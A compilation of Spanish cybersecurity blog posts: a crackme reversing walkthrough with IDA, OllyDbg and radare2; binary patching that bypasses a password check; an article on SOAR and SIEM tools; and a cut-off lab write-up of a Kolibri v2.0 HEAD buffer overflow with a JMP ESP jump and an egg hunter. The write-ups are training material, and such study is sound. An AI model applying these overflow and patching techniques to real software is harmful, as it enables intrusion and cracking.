llamarlo. Tenemos los siguiente binarios, compilados con Mingw (en Windows) y gcc (en Linux). [Imagen: Ejercicio_Ciberseguridad-1] El código fuente del que se partió fue este: ``` #include #include #define password "HolaHackers" int main (int argc , char * argv []) { char pwd[100]; printf("Please enter the password::\n"); scanf("%s", pwd); if ( strcmp(pwd, password) == 0 ) { printf("Congratulation!!\n"); printf("Ready to login with: %s\n",password); } else { printf("Wrong password\n"); } getchar(); return 0; } ``` Pero este hubiera sido muy sencillo resolverlo por lo que lo compliqué un poco: ``` #include #include #define error "error" #define nop "nop" #define password "nohackershere" #define access "access" #define good "Good!" #define admin "admin" int main (int argc , char * argv []) { char pwd[100]; printf("Please enter the password::\n"); scanf("%s", pwd); if ( strcmp(pwd, error) == 0 ) { if ( strcmp(pwd, nop) == 0 ) { //Do nothing } } if ( strcmp(pwd, password) == 0 ) { if ( strcmp(pwd, good) == 0 ) { //Do nothing } printf("Congratulation!!\n"); printf("Ready to login with: %s\n",admin); } else { printf("Wrong password\n"); if ( strcmp(pwd, access) == 0 ) { //Do nothing } } getchar(); return 0; } ``` Como veis, es muy parecido, se trata de meter “basura” en el anterior. ¿Cómo lo han resuelto algunos? Con el comando “strings”. Pero eso no tiene gracia :P Lo gracioso es hacerlo de esta otra forma. Comencemos. IDA: Abrimos el de Linux, en Windows, ¿no os parece gracioso? [Imagen: Ejercicio_Ciberseguridad-2] Después de aceptar un montón de ventanas, incluídas la de tu licencia ha caducado en 2015, vemos lo siguiente: [Imagen: Ejercicio_Ciberseguridad-3] Ya en la primera ventana nos da pistas, este IDA… Justo debajo vemos el clásico check de chico bueno y chico malo. [Imagen: Ejercicio_Ciberseguridad-4] Por lo que habrá una comparación en algún sitio. Lo buscamos. Ponemos el código para visualizarlo mejor en modo gráfico (esta vez sí se cumple lo del botón derecho ;-)) [Imagen: Ejercicio_Ciberseguridad-5] Los que hayais seguido algún tutorial de Ricardo Narvaja, veréis que a él le gusta colorear, a mí también, así que vamos a ello. [Imagen: Ejercicio_Ciberseguridad-6] Y llegamos al Kit (como diría Michael Knight, ¿era así?) de la cuestión. Se realiza una comparación con la función “strcmp”. Buscamos esa función para ver lo que hace y lo que devuelve: strcmp . Bien, entonces: ``` loc_40069B: lea rax, [rbp+s1] ; cargamos la dirección rbp+s1 que es lo que hemos introducido nosotros en rax. mov esi, offset aNohackershere ; "nohackershere" ; movemos esta cadena a esi mov rdi, rax ; s1 movemos a rdi lo que hemos introducido nosotros call _strcmp ; llamamos a comparar las 2 strings “nohackershere” con lo que hemos introducido nosotros test eax, eax ;el resultado se guarda en eax y los comparamos jnz short loc_4006E1 ; si el resultado no es cero, salta a loc_4006E1 ``` Por lo que ya está claro con qué lo compara. La cadena que buscamos es “nohackershere”. El resto, son despistes, o eso pretendía :P Si pulsamos F5 en IDA, nos intenta traducir el código a C: [Imagen: Ejercicio_Ciberseguridad-7] Para ser sincero, se parece bastante al original y se me mejor aún lo que buscabamos. OllyDBG: Lo cargamos en el Olly y paramos aquí, en el Entry Point: [Imagen: Ejercicio_Ciberseguridad-8] De nuevo el botón derecho nos salvará. [Imagen: Ejercicio_Ciberseguridad-9] Podemos ver las strings. [Imagen: Ejercicio_Ciberseguridad-10] Si pulsamos en la “Congratulation!!”, por ejemplo, iríamos a la parte del código que nos dará la enhorabuena, subimos un poco y vemos donde se realiza la comprobación. Doble click y… [Imagen: Ejercicio_Ciberseguridad-11] Subimos para ver todo el código: [Imagen: Ejercicio_Ciberseguridad-12] Si nos fijamos, vemos como el “Congratulation!!” está justo después de este “strcmp”. [Imagen: Ejercicio_Ciberseguridad-13] Por lo que lo compara con “nohackershere”. Visualmente se ve peor que en IDA. Juguemos con Olly para verlo. Breakpoint (F2) en 004014BA y F9 para llegar a ahí, pero antes pararemos en introducir nuestra contraseña… [Imagen: Ejercicio_Ciberseguridad-14] [Imagen: Ejercicio_Ciberseguridad-15] Ponemos, “niidea” y pulsamos “enter” o lo que más os guste. [Imagen: Ejercicio_Ciberseguridad-16] Paramos y vamos pulsando F8. [Imagen: Ejercicio_Ciberseguridad-17] Vemos como en EAX aparece nuestro “niidea”. [Imagen: Ejercicio_Ciberseguridad-18] Mirad la comparación que va a realizar: [Imagen: Ejercicio_Ciberseguridad-19] Por lo que ya tenemos con Olly el resultado: “nohackershere”. [Imagen: Ejercicio_Ciberseguridad-20] Vemos el valor de EAX que no es cero por lo que saltará a chico malo. [Imagen: Ejercicio_Ciberseguridad-21] Reiniciemos el Olly y pongamos la contraseña buena. [Imagen: Ejercicio_Ciberseguridad-22] Pongo un breakpoint (F2) en el salto para ver el valor de EAX. [Imagen: Ejercicio_Ciberseguridad-23] F9 para ejecurtarlo y parar en él: [Imagen: Ejercicio_Ciberseguridad-24] Y vemos como EAX vale 0, por lo que debería continuar y no saltar, F8 para comprobarlo: [Imagen: Ejercicio_Ciberseguridad-25] Y aquí nos dan la enhorabuena: [Imagen: Ejercicio_Ciberseguridad-26] [Imagen: Ejercicio_Ciberseguridad-27] Radare2: Para ello utilizaré un GUI para el Framework de Radare2 llamado radare2gui: Voy a abrir el de Linux, si no os importa :P [Imagen: Ejercicio_Ciberseguridad-28] Fijaros en esas instrucciones, son las que carga en cada pestañam, por lo que si queréis hacerlo sin este GUI, podeis ponerlas directamente en radare2. En las “strings”, vemos lo siguiente: [Imagen: Ejercicio_Ciberseguridad-29] Como veis, es parecido al Olly. Si pulsamod doble click en “Congratulation!!”, por detrás ejecuta lo siguiente: [Imagen: Ejercicio_Ciberseguridad-30] Se posiciona en 0x004007d1, es decir, donde se encuentra la cadena y le da un tamaño al bloque para visualizarlo (4000) en la pestaña de hexview y además lo visualiza en la pestaña de graficos. Como podeis suponer, cada vez que se realiza una acción, el GUI lo hace tantas veces y de formas diferentes para cada pestaña. Esto es lo que vemos en Hexview: [Imagen: Ejercicio_Ciberseguridad-31] Es solamente un ejemplo de como podemos llegar a donde queramos según las “strings” y siguiendo la filosofía OllyDBG. En este caso lo mejor es darle doble click a la función “main”. [Imagen: Ejercicio_Ciberseguridad-32] Si bajamos un poco, como en IDA, vemos lo siguiente: [Imagen: Ejercicio_Ciberseguridad-33] Chico bueno y chico malo, de nuevo. [Imagen: Ejercicio_Ciberseguridad-34] Y vemos claramente una cadena, en este caso “str.nohackershere”. En Radare2, es la forma de ponerte el conenido de las cadenas, “str.cadena”, por lo que ya sabes la solución. En “local_70h” va a guardar lo que le pongamos nosotros. Primero acaba en rax y después en rdi, igual que habíamos visto en IDA. Y lo mismo con la cadena que buscamos. [Imagen: Ejercicio_Ciberseguridad-35] Como veis hay muchas formas de resolverlo, desde un strings, lo más sencillo, hasta 3 herramientas muy potentes como IDA, OLLYDBG y Radare2. Ya sé lo que pensareis algunos con lo del GUI de Radare2… Vale… [Imagen: Ejercicio_Ciberseguridad-36] [Imagen: Ejercicio_Ciberseguridad-37] También se ve. [Imagen: Ejercicio_Ciberseguridad-38] [Imagen: Ejercicio_Ciberseguridad-39] [Imagen: Ejercicio_Ciberseguridad-40] ## Cambios en binarios Hola a todos!! Alguno me he preguntado como se hacen los cambios en el binario para que se hagan persistentes y meta lo que meta siempre funcione. Explicaré 2 formas. Hiew: Arrastramos el binario (“easy-level1.exe”) a Hiew.exe (Drag and Drop). [Imagen: Cambio_Binarios_Ciberseguridad-1] Necesitamos verlo de otra forma, por lo que pulsamos F4. [Imagen: Cambio_Binarios_Ciberseguridad-2] Y ahora F2 para que nos cambie la vista a ensamblador. Esta forma es más bonita y tratable :P [Imagen: Cambio_Binarios_Ciberseguridad-3] Necesitamos ir a una dirección de memoria, por lo que pulsamos F5, pero antes, ¿a qué dirección de memoria? [Imagen: Cambio_Binarios_Ciberseguridad-4] A esta: 0x004014D0. En OllyDBG… El caso es que hay que hacer un cambio para que esto funcione. F4 para pasar de 16 a 32 bits [Imagen: Cambio_Binarios_Ciberseguridad-5] Vemos la diferencia, ¿verdad? ¿Ahora ya podemos ir a 14D0? Debe ser la versi´n de Hiew, demasiado antigua. Esta debe tener como 15 años o más… Buscamos los opcodes que nos identifiquen el salto: [Imagen: Cambio_Binarios_Ciberseguridad-6] [Imagen: Cambio_Binarios_Ciberseguridad-7] Me cuadra, ahora bien,¿ JNE lo queremos cambiar a JE? ¿Qué pasaría si alguien introduce la buena? Pues que saltaría a chico malo y no queremos eso. Es mejor un JMP a la siguiente dirección, es decir, que continúe con el programa, que no salte. Cambiamos con F3: [Imagen: Cambio_Binarios_Ciberseguridad-8] Por: [Imagen: Cambio_Binarios_Ciberseguridad-9] Que es la dirección siguiente. Pongas lo que pongas, continúa. Pulsamos ENTER. F9 (actualizar el binario) Y F10 pasa salir (igual no le gusta…) O bien… juguemos con NOP (no operation). Ponemos 4. [Imagen: Cambio_Binarios_Ciberseguridad-10] F9 (actualizar el binario) Y F10 pasa salir. [Imagen: Cambio_Binarios_Ciberseguridad-11] Pare que funciona. Segundo método y con menos quebraderos de cabeza. OllyDBG: [Imagen: Cambio_Binarios_Ciberseguridad-12] Lo mismo que antes, el JNZ lo tenemos que cambiar a otra cosa. Un JMP a la siguiente dirección, la de los NOP ya lo hemos visto antes. [Imagen: Cambio_Binarios_Ciberseguridad-13] Lo cambio: [Imagen: Cambio_Binarios_Ciberseguridad-14] Botón derecho: [Imagen: Cambio_Binarios_Ciberseguridad-15] [Imagen: Cambio_Binarios_Ciberseguridad-16] Confirmamos: [Imagen: Cambio_Binarios_Ciberseguridad-17] [Imagen: Cambio_Binarios_Ciberseguridad-18] Ya está guardado y comprobamos que lo hemos hecho bien, F8 y: [Imagen: Cambio_Binarios_Ciberseguridad-19] Sí, ha continuado… F9 para finalizar. [Imagen: Cambio_Binarios_Ciberseguridad-20] Ahora vamos al que hemos guardado y… [Imagen: Cambio_Binarios_Ciberseguridad-21] Funciona ;-) Espero que os haya gustado y hasta otra. --- # Por qué las herramientas SOAR revitalizarán el ecosistema SIEM URL: https://ciberseguridad.blog/por-que-las-herramientas-soar-revitalizaran-el-ecosistema-siem/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2018-11-18 Actualizado: 2026-10-04 Tema: Operaciones de Seguridad > Las soluciones SIEM, se nos quedan cortas, adquirir soluciones SOAR (Security Orchestration Automation and Response) es más que necesario. ! EVOLUCIONA ¡ Fue por el 2005, cuando el SIEM se popularizó por primera vez como una forma de ayudar a las organizaciones a monitorizar sus redes y sistemas TI de manera más efectiva, el panorama digital era marcadamente diferente. La adopción cloud fue mínima, las fuerzas de trabajo estaban menos distribuidas y se usaban muchos menos endpoints. Cómo cambian los tiempos. La superficie de ataque se ha transformado en la última década y continúa evolucionando a gran velocidad. Al mismo tiempo, las amenazas se han vuelto cada vez más sofisticadas y difíciles de detectar. Para evitar ser descartados como una solución heredada, las tecnologías SIEM tienen que mejorar su estrategia. ## La evolución del SIEM. El panorama digital cambiante está creando una serie de nuevos desafíos para los desarrolladores de tecnologías SIEM. Si bien SIEM se basó en solo unas pocas fuentes de datos, como firewalls y sistemas de detección de intrusos (IDS / IPS), la 'próxima generación' de sistemas SIEM debe evolucionar para procesar un mayor volumen y variedad de datos, así como mejorar su capacidad de correlación. Las amenazas avanzadas (APTs) ahora son polimórficas en lugar de estáticas, capaces de cambiar constantemente su comportamiento para evadir la detección. Como tal, los sistemas SIEM no solo deben procesar más datos, sino que también deben ser mucho mejores para reconocer nuevos patrones dentro de ellos. Mejorar la interoperabilidad con las nuevas tecnologías de seguridad, como las herramientas EDR (detección y respuesta de puntos finales) y UEBA (User & Entity Behavior Analytics), así como las plataformas de inteligencia de amenazas, El SIEM ha sido un foco para muchos proveedores en los últimos años. Permitiendo que los equipos de seguridad maximicen los beneficios de una selección cada vez mayor de herramientas de seguridad, por ello, también las soluciones SIEM tienen que evolucionar para facilitar la administración de todas estas tecnologías. A pesar de su capacidad para aumentar la visibilidad de las amenazas, las tecnologías complementarias tienen el potencial de aumentar la fatiga de alertas y el tiempo muerto cuando el contexto cambia entre aplicaciones. La mejora del flujo de trabajo, la reducción de la carga de la monitorización de seguridad y la aceleración de la respuesta ante incidentes (CSIRT) son áreas que se deben mejorar para que los equipos de seguridad se den cuenta de los beneficios de los sistemas SIEM más inteligentes. Esto es particularmente importante dado los muchos desafíos que a los que se enfrentan las organizaciones para atraer y retener el talento de seguridad que necesitan para ejecutar las operaciones: el objetivo es trabajar de manera más inteligente, no más difícil. ## Herramientas SOAR Security Orchestration, Automation and Response (SOAR) es un área de seguridad en crecimiento que los proveedores de SIEM están aprovechando. Está compuesto por tres mercados tecnológicos distintos: 1. Orquestación y automatización de la seguridad 2. Plataformas de respuesta a incidentes de seguridad (SIRP) 3. Plataformas de inteligencia de amenazas (TIP). Su propósito general es ayudar a las organizaciones a mejorar la detección y respuesta de amenazas a través de la agregación y la correlación de datos más ricos y de calidad unida a la automatización de las tareas rutinarias de seguridad. Mientras que las soluciones SIEM tradicionales dependían en gran medida de una pequeña cantidad de fuentes de inteligencia de amenazas, las herramientas SOAR estan impulsando a las organizaciones a recopilar mayores volúmenes de datos internos/externos y procesarlos de forma más rápida y precisa. Es una tendencia que está ayudando a las operaciones de seguridad a ser más inteligentes siendo impulsadas por Big Data, lo que permite a los equipos tomar decisiones más rápidas y mejor informadas. Una inteligencia más amplia también significa una identificación de amenazas más confiable y con menos falsos positivos. Otra manera clave en la que las herramientas SOAR está influenciando los planes de trabajo de los productos SIEM es ayudando a estandarizar los procedimientos de respuesta y análisis de incidentes. El objetivo en esta parte es automatizar parcial o totalmente una serie de actividades para que el personal de seguridad tenga más tiempo para buscar amenazas en lugar de responder a ellas. A través de la automatización de acciones de respuesta, como bloquear una dirección IP en un firewall o un sistema de detección de intrusos, suspender las cuentas de usuario o poner en cuarentena los puntos finales infectados de una red, las herramientas SOAR pueden ayudar a facilitar una respuesta a incidentes más rápida y, por lo tanto, reducir el daño potencial y las interrupciones que las violaciones pueden provocar. [Vídeo](https://www.youtube.com/watch?v=xYrC95A96J0) ## El SIEM del futuro Gartner predice que para fines de 2020, el 15% de las organizaciones con un equipo de seguridad de más de cinco personas aprovechará las soluciones SOAR. Su enorme potencial para mejorar la eficiencia y eficacia de las operaciones de seguridad significa que es probable que desempeñe un papel crucial para ayudar a dar forma al desarrollo del futuro SIEM. La clave para la adopción de herramientas SOAR por parte de los proveedores de soluciones SIEM será demostrar que se puede confiar en la inteligencia artificial y el aprendizaje automático para hacer cambios en los sistemas. Si bien este es el caso, las personas / humanos tomadores de decisiones seguirán siendo vitales para la detección y respuesta de amenazas. Aprovechar al máximo el SIEM, para ayudar a enfrentarnos a los crecientes desafíos de seguridad, no solo dependerá de algoritmos más inteligentes, sino de personal mejor capacitadas que puedan usar los sistemas con mayor eficacia y validar alertas. La superficie de ataque, que ya se ha transformado drásticamente desde la introducción de SIEM, continuará cambiando a gran velocidad en los próximos años. Las organizaciones solo podrán responder a estos cambios con mejores herramientas y una fuerza laboral más capacitada y eficiente. ## La necesidad de disponer herramientas SOAR Por ahora, los beneficios de los sistemas Security Orchestration, Automation and Response (SOAR) son obvios para casi todos los analistas CISO y de seguridad. Los beneficios para los Centros de Operaciones de Seguridad (SOCs) incluyen: - Automatización de tareas para ayudar a los SOCs con personal limitado aumentando la productividad de manera exponencial. - Automatizar la clasificación básica de seguridad, para que las alertas se manejen de manera integral y las alertas importantes nunca se pasen por alto debido a la carga de trabajo del personal - Liberar a los analistas de seguridad para trabajar en tareas no repetitivas, como la búsqueda proactiva de amenazas y la colaboración con unidades de negocios, una vez que las operaciones de rutina son automatizadas, lo que mejora la efectividad general del SOC - Lograr la excelencia operacional al reemplazar los procesos ad hoc con las mejores prácticas documentadas, automatizadas y realizadas de manera consistente Pero mientras los SOC reconocen los beneficios de los sistemas SOAR, también podemos enumerar una larga lista de obstáculos que pueden limitar la efectividad de una implementación SOAR o hacer que una implementación de herramientas SOAR parezca demasiado poco práctica. Y es que los que vivimos en el mundo de la tecnología, conocemos los problemas y dolores de cabeza que produce introduccir una nueva tecnología. Aquí hay una rápida lista de obstáculos en el despliegue de herramientas SOAR: - Muchos sistemas SOAR son demasiado caros: Las nuevas tecnologías potentes a menudo tienen precios exorbitantes cuándo se presentan. Los automóviles solían ser accesibles solo por los aficionados más ricos. Con el tiempo, se convirtieron en necesidades asequibles para todos los hogares. Muchos sistemas SOAR de hoy solo son asequibles para SOC con grandes presupuestos. - Los sistemas SOAR requieren programación, pero la mayoría de los equipos SOC carecen de desarrolladores: Muchos sistemas SOAR requieren que los usuarios escriban Python para construir Playbooks e integrarlos con otras herramientas y aplicaciones de seguridad. La gran mayoría de los equipos de SOC carecen de las habilidades de programación de Python y el tiempo para asumir un nuevo trabajo de integración, por lo que el requisito de la programación se convierte en un factor decisivo. - Las llamadas integraciones listas para usar son demasiado limitadas: Los SOAR deben integrarse con herramientas de seguridad para las que puedan recopilar alertas y otros datos de ellos y emitir comandos, orquestando las respuestas a las amenazas. Algunos proveedores SOAR ofrecen integraciones, pero los SOC pronto descubren que las integraciones no incluyen funciones para las tareas y características de las que dependen. Con demasiada frecuencia, los SOC se ven obligados a desarrollar integraciones o contratar a expertos externos para crear integraciones no proporcionadas por los proveedores. - Las API de las herramientas de seguridad son demasiado limitadas: Para complicar aún más el desafío de integrar SOARs con herramientas de seguridad, está la limitación de muchas API de herramientas de seguridad. Estas herramientas pueden ofrecer APIs para unas pocas operaciones básicas, suficientes para aprobar una demostración, pero no lo suficiente como para admitir la automatización efectiva de sus operaciones. Hay datos en los que ciertos SOCs solo han integrado un 30% de las funciones de sus herramientas de seguridad debido a la dispodición de las APIs. Sin APIs para aprovechar, la automatización de la seguridad, se termina confiando en comandos basados ​​en el navegador. O bien los analistas continúan emitiendo estos comandos en los navegadores, o las soluciones de automatización de seguridad necesitan expandir sus características para admitir la automatización basada en el navegador. Hasta ahora, la mayoría de los sistemas SOAR siguen siendo débiles en esta área de automatización, y por ello, debemos conocer muy bien nuestro scope de integración. - Los SOCs creen que sus procesos son demasiado ad hoc o especializados para ser automatizados: Escuchamos esta objeción de muchos analistas de seguridad. Están convencidos de que lo que hacen es demasiado único o complicado de documentar. Y es que si no se puede documentar, no se puede automatizar. - Los SOCs carecen del tiempo necesario para construir y ajustar las automatizaciones por sí solas: La construcción de la automatización lleva tiempo. Se necesita atención sostenida y un poco de ensayo y error. Desafortunadamente, la mayoría de los SOCs están tan ocupados luchando contra sus colas de clasificación que no pueden disponer de las horas o los días para crear lo que les llevaría a ahorrarse semanas o meses a lo largo del año. --- # BoF y los "egg hunter" en Kolibri v2.0 HTTP Server URL: https://ciberseguridad.blog/bof-y-los-egg-hunter-en-kolibri-v2-0-http-server/ Tipo: Artículo Autor: Rafa.Pedrero Publicado: 2018-11-12 Actualizado: 2026-10-04 Tema: Vulnerabilidades y Ataques Informaticos > Hoy, vamos a ver uno de los ejercicios de ciberseguridad [https://ciberseguridad.blog/] del curso que tiene CORELAN [https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/] . Vamos con el ejercicio 3, el servidor versión Kolibri v 2.0 : Creamos una página inicial “index.htm” con el contenido que más le guste a uno y le cambiamos la ruta, donde se encuentre ese index. Y comprobamos que al darle al botón “Start”, y que inicia correctamente, se ve en nu Hoy, vamos a ver uno de los ejercicios de ciberseguridad del curso que tiene CORELAN. Vamos con el ejercicio 3, el servidor versión Kolibri v 2.0 : [Imagen: Ventana Acerca de Kolibri mostrando la versión 2.0 del servidor web] Creamos una página inicial “index.htm” con el contenido que más le guste a uno y le cambiamos la ruta, donde se encuentre ese index. [Imagen: Kolibri WebServer y Notepad++ mostrando el código HTML index.htm y la página demo] Y comprobamos que al darle al botón “Start”, y que inicia correctamente, se ve en nuestro navegador, por ejemplo el Google Chrome. Como tampoco queremos reinventar la rueda y sabemos que es vulnerable, buscamos por donde irán los tiros… [Imagen: Página de exploit-db sobre el desbordamiento de búfer HEAD del servidor Kolibri 2.0] Vale así que el método HEAD tiene problemas, jeje. Vamos que peta por algún sitio. [Imagen: Detalle del módulo Metasploit exploit/windows/http/kolibri_http para el desbordamiento de Kolibri] Y además hay publicado un exploit para el metasploit: [Imagen: Código Ruby del exploit Metasploit generando un egg hunter para el payload] Vale, pero ¿queremos ir a tiro hecho? ¡¡¡Claro que no!!! Nos gusta complicarnos y encontrar donde peta. ¿Y cómo buscarlo? Fuzzeando que es gerundio :P Creo un sencillo script en Perl, ya sabéis que me encanta y para estas cosas es lo más rápido (para mí :P), pero en la máquina de Corelan no está el Active Perl instalado. Como no quiero tocarla mucho, utilizo un programa mío para redireccionar las peticiones desde mi PC host a la virtual de Corelan, ya que este servicio corre en la dirección localhost: [Imagen: Iconos de Fuzzing_Kolibri.pl y HTTPTunnel.exe junto a la ventana de uso de HTTP Tunnel] [Imagen: Consola de Windows con netstat mostrando el puerto 8080 en escucha junto a HTTP Tunnel] Cambiamos el adaptador de red: [Imagen: Configuración de red de VirtualBox con reglas de reenvío del puerto TCP 8081] Y abrimos una regla para que en el puerto 8081 de nuestra máquina vaya hacia el de la virtual. $ nmap -sT -p8081 localhost Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-10 10:13 CESTNmap scan report for localhost (127.0.0.1)Host is up (0.000028s latency).PORT STATE SERVICE8081/tcp open blackice-icecap Nmap done: 1 IP address (1 host up) scanned in 0.03 seconds Bien, parece que funciona: [Imagen: Navegador mostrando la página Demo de Exploiting en localhost puerto 8081] A lo que iba, creo el script en Perl sencillito, sin hilos ni nada: [Imagen: Código Perl del script Fuzzing_Kolibri.pl enviando peticiones HEAD con cadenas de A] Este es el aspecto que tendría una vez se está ejecutando el script: [Imagen: Terminal con errores 404 repetidos junto al registro del servidor Kolibri WebServer] Y catapum! [Imagen: Explorador de Windows con el icono Kolibri.exe y el diálogo de fallo del programa] Veamos los detalles: [Imagen: Ventana de detalles del informe de error de Kolibri.exe con la dirección de memoria del fallo] [Imagen: Bloc de notas con el archivo sd85_appcompat.txt y el diálogo de error de Kolibri.exe superpuesto] Bueno, de esta forma poca cosa, ¿qué nos dirá el debugger? Parece que el fallo viene cuando le pasas unas 215 ó 216 A…. seguramente el primero, así que lo compruebo. [Imagen: Terminal mostrando errores 404 seguidos del mensaje Error 500 read timeout que provoca el fallo] Lo comprobamos: [Imagen: Editor con las pestañas Fuzzing_Kolibri.pl y Fuzzing_Kolibri_215A.pl mostrando el valor fijo 215] Y efectivamente, peta al enviarle 215 A con el método HEAD, pero con ese tamaño no controlamos el EIP ni nada…. [Imagen: Terminal ejecutando Fuzzing_Kolibri_215A.pl junto al diálogo de fallo de Kolibri WebServer] Lo abrimos con el Inmunity: [Imagen: Immunity Debugger adjunto al proceso Kolibri.exe junto a la ventana de Kolibri WebServer] configuramos mona.py: [Imagen: Registro de Immunity Debugger con los módulos cargados y el comando mona config workingfolder] Creo este otro script y lo lanzo: [Imagen: Editor con tres versiones del script Perl mostrando patrones de bytes A, B y C] [Imagen: Immunity Debugger mostrando una violación de acceso tras enviar el patrón de fuzzing AAAABBBBCCCC] Vale, así que el EIP lo controlaré gracias a la zona en donde metí las C (43434343). A mí el moma este no me guarda lo que necesito :P así que voy a explotarlo como antaño, jeje. Creo el script con un patrón creado con el patter_create: [Imagen: Script Perl con el patrón único generado por mona.py asignado a la variable pattern] Y lo mismo: [Imagen: Immunity Debugger muestra un fallo de escritura en Kolibri.exe durante el fuzzing con Perl] Pufff! Ese EIP parece una dirección de memoria, no algo que yo le haya metido en ese string… así que parece que aquí el tamaño importa…. Lo voy a acortar, lo dejaré en unos 600 en total. [Imagen: Terminal muestra error 404 y patrón cíclico causando una violación de acceso al ejecutar EIP] El EIP es: 32724131 -> 2rA1 -> Little Endian -> 1Ar2 [Imagen: Cuadro de diálogo Buscar en Immunity Debugger localizando el patrón cíclico 1Ar2] [Imagen: Notepad++ con el patrón cíclico completo y la subcadena 1Ar2 resaltada] Vale, nosotros controlamos el servidor… pero ¿y si no tuviésemos ese control? Nos la tenemos que jugar y jugar significa utilizar direcciones estándar para un Sistema Operativo concreto, en este caso un Windows XP SP3 (de la máquina Virtual de Análisis de Malware, no la de Corelan). Como veremos en el ejercicio 2, localicé un JMP ESP en kernel32 y utilizaré la misma: [Imagen: Consola cmd ejecutando findjmp sobre kernel32.dll y hallando tres direcciones jmp esp] Vale, entonces nuestro primer exploit para ejecutar la calculadora de Windows y que utilicé en el ejercicio 2 sería: [Imagen: Editor de código Perl del exploit_Kolibri_byRafa.pl con shellcode y petición HTTP a Kolibri] Vamos muy parecido la forma de explotarlo en remoto, de esta forma pero creo que no funcionará… [Imagen: Terminal con la respuesta 404 y el shellcode NOP en hexadecimal devuelto por Kolibri] Pero esto qué es!!! Normal, hay que modificar el script original. Lo sé, juega con el “pack”, blah, blah, blah! Pero yo soy de la opinión de si algo no te gusta, cámbialo! No vayas hasta el final con algo que no te gusta sólo porque sí, cámbialo, mejóralo! [Imagen: Código Perl del exploit usando IO::Socket::INET para conectar y enviar la petición GET] Lo probamos, no hay nada como usar sockets :P [Imagen: Immunity Debugger muestra los registros sobrescritos con la cadena de A tras el exploit] Pero no hace nada… cachis. Voy a ver la dirección de memoria que puse… pues no está L Normal, no tiene porqué tener las mismas direcciones en máquinas distintas, ese es uno de los problemas más comunes a la hora de programar un exploit en la que no calculas la dirección en el mismo. Primer zas en toda la boca, como decía alguno! jeje [Imagen: Consola cmd con findjmp escaneando ntdll.dll y listando cuatro direcciones jmp o push esp-ret] La modifico por una de las existentes: [Imagen: Código Perl con la dirección EIP del jmp esp hallada con findjmp anotada en rojo] [Imagen: Immunity Debugger con el registro mostrando la cadena calc.exe tras la ejecución del shellcode] Calc.exe, lo vemos… pero… nop ¿Qué ha pasado? [Imagen: Ventana de error de Immunity Debugger por memoria no legible en la dirección 77BF93C7] Eh! Esa no era mi dirección… ¿os acordáis lo que conté al principio del tamaño importa? Además si nos fijamos en los registros: [Imagen: Panel de registros FPU de Immunity Debugger con la cadena calc.exe en la pila] Estoy saltando a una dirección en la que antes, hay código. Parece que eso no funciona…. Pensemos un poco… parece que podríamos controlar ebp, salta allí…. Vale, si le metemos la salida del pattern_create: [Imagen: Immunity Debugger con violación de acceso al ejecutar la dirección del patrón cíclico 1Ar2] Así que esto debería funcionar: [Imagen: Código Perl del exploit con el EIP actualizado y el shellcode antes del control esp] Por más que pruebo no funciona…. No será por esto? [Imagen: Dependency Walker con la calculadora abierta y la tabla de funciones y puntos de entrada] Nueva shellcode: [Imagen: Desensamblado construyendo la cadena calc.exe byte a byte antes de la llamada a EBX] Me estoy volviendo loco para calcular como saltar al sitio, estoy desanimado, así que lo dejo para el día siguiente :-D Eso sí, dándole vueltas en la cabeza. Un poco de ficción: llega la tarde y mi hija me dice…. Hija: papá ponme la peli de los boxtrolls, por favor (Es muy educada) Yo: Claro, ahora mismo. - Conecto el disco duro y se la pongo – Al rato… Hija: has visto, papá, los malos quieren “cazar a Eggs”. Yo: ¿Cómo? ¿qué has dicho? Hija: que los malos quieren cazar a Eggs. Este es Eggs: [Imagen: Fotograma de la película de animación Los Boxtrolls con el personaje Eggs y varios boxtrolls] Yo: Uhmmmm! Gracias, hija, me has dado una idea :P Fin del poco de ficción. ## Hablemos del mineralismo y de los “eggs hunters” Ó de esta técnica utilizada por los exploiters… Supongamos que podemos poner en la memoria un string, como “egg”, “FreeKevin”, o lo que más os guste, pudiésemos buscarlo y al encontrarlo, saber donde ejecutar la shellcode que nosotros hemos puesto a continuación… Supongamos que como decía que el tamaño importa, solamente podemos poner un trocito de código aquí, otro allí….. que el primero busque el segundo (ahí no tenemos problemas de espacio) y ejecutar lo que queramos…. El flujo de ejecución sería algo similar a esto: 1. En el primer buffer (limitado) introducimos nuestro cazador de huevos (egg hunter). 2. Una vez controlamos el EIP (nuestro caso) apuntamos al segmento de memoria anterior para poder ejecutar el egghunter. 3. El egghunter busca nuestra shellcode en toda la memoria (al ser un proceso proceso cíclico, consumirá recursos en el PC, se quedará como “pensando”, es lo que siempre me dicen cuando parece que el proceso está cuasi colgado :P). 4. El EIP se sobreescribirá con la nueva dirección de memoria de la shellcode que haya encontrado y la ejecutará. Sería esto: [Imagen: Diagrama de diapositiva que explica la implementación del egg hunter con ESP y EIP] Parece parte de la historia de ficción de los boxtrolls, pero no, esto es real al 100% :P Al lío. Volvemos a calcularlo todo, esta vez con otro pensamiento de explotación en la mente, el ejercicio 3 es diferente, como nosotros, jeje. Gracias a Alberto, que me envió un tutorial sobre el funcionamiento del Mona :-D [Imagen: Immunity Debugger con el log de findmsp mostrando el offset del patrón cíclico en ESP] Sacamos el ESP, aunque deberían funcionar cualquiera, a mí me funcionó con la que está subrayada: [Imagen: Ventana de Immunity Debugger listando módulos con banderas ASLR, Rebase y SafeSEH] Ejecutamos el comando para que nos guarde el “cazador de huevos”, como suena: [Imagen: Log de mona.py en Immunity Debugger con nota sobre guardar el código del egg hunter] [Imagen: Fichero egghunter.txt de mona.py con la etiqueta w00tw00t que debe buscar el egg hunter] Utiliza NTAccessCheckAndAuditAlarm: [Imagen: Código ensamblador comentado del egg hunter explicando la búsqueda de la etiqueta página a página] Todo esto viene en los siguientes enlaces explicado: 1. Egghunt Shellcode 2. Heap 3. Heap Only Egg Hunter Leedlo, si no lo habéis hecho ya :P Consideraciones para que todo esto funcione: - La palabra que busquemos debería ser única (cómo haya repes, como los cromos de fútbol cuando solamente te quedaban unos poco, fallará) - Es necesario definir la etiqueta de 4 bytes en el interior del egg hunter, y hacerlo 2 veces (2 veces después de cada uno, en total 8 bytes) antes de nuestra Shellcode que queremos explotar. - Hay varias técnicas para buscar en memoria y no todas tienen porqué funcionarte. (NTAccessCheckAndAuditAlarm es la que he utilizado y funciona, viene explicado aquí ). - Cada técnica es diferente y requieren un espacio determinado disponible para introducir nuestro código del egg hunter. Vale, con todo esto ya 